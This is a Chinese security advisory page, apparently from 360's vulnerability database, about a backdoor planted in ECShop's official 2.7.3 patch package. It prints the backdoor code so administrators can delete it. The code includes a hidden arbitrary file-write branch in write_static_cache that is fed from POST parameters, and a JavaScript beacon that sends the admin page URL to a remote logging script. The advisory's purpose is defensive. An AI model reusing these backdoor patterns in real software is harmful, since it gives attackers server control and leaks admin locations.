360鹰眼-更智能的Web安全监控系统

产品描述:

下一代web漏洞扫描器,她是一款硬件,包含:最全面的"爬出"引擎,不再需要收集资产清单,不再需要指定扫描时间,同步发现新上线业务漏洞

适用对象:

企业

价格服务:

目录价19.8万起
我了解,我要试用
高危高危

ECShop 2.7.3官方补丁包存在后门

WASC Threat Classification

发现时间:

2013-05-22

漏洞类型:

其他

所属建站程序:

Ecshop

所属服务器类型:

通用

所属编程语言:

PHP

描述:

ECShop官网论坛被入侵,导致ECShop V2.7.3版本补丁包(2013.5.7补丁包)被植入后门代码。

危害:
可被攻击者写入webshell,进而获取服务器权限,导致服务器变成‘肉鸡’。
解决方案:

后门代码主要存在如下三个文件:
1)\includes\lib_base.php
2)\includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php
3)\admin\js\common.js

请手动删除相关代码:

1)删除\includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\目录下的check.php(文件内容webscancheckdoorpleasefixit)

2)打开文件\includes\lib_base.php 按如下说明修改代码:
function write_static_cache($cache_name,$caches,$newname,$newfile)
{
    if (!empty($cache_name)){
           if ((DEBUG_MODE & 2) == 2)
    {
        return false;
    }
    $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php';
    $content = "<?php\r\n";
    $content .= "\$data = " . var_export($caches, true) . ";\r\n";
    $content .= "?>";
    file_put_contents($cache_file_path, $content, LOCK_EX);
}else{
@file_put_contents($newfile, $newname);
}
}
修改为:
function write_static_cache($cache_name, $caches)
{
    if ((DEBUG_MODE & 2) == 2)
    {
        return false;
    }
    $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php';
    $content = "<?php\r\n";
    $content .= "\$data = " . var_export($caches, true) . ";\r\n";
    $content .= "?>";
    file_put_contents($cache_file_path, $content, LOCK_EX);
}

3)打开文件\includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php 删除如下代码:
$newname = $_POST['newname'];
$newfile = $_POST['newfile'];
write_static_cache($cache_name,$caches,$newname,$newfile);

4)打开文件\admin\js\common.js 删除如下代码:
if(!window.x){
        (function(){(new Image()).src='http://bbs.ecshop.com/forumdata/logs/install.php?location='+escape((function(){try{return document.location.href}catch(e){return ''}})());})();
}
window.x=1;

可以参考http://www.2cto.com/Article/201305/213322.html,另外请关注官方最新补丁。

 

如果你的网站服务器是Windows系统,建议使用"主机卫士"修复漏洞,点击下载
对该漏洞进行评论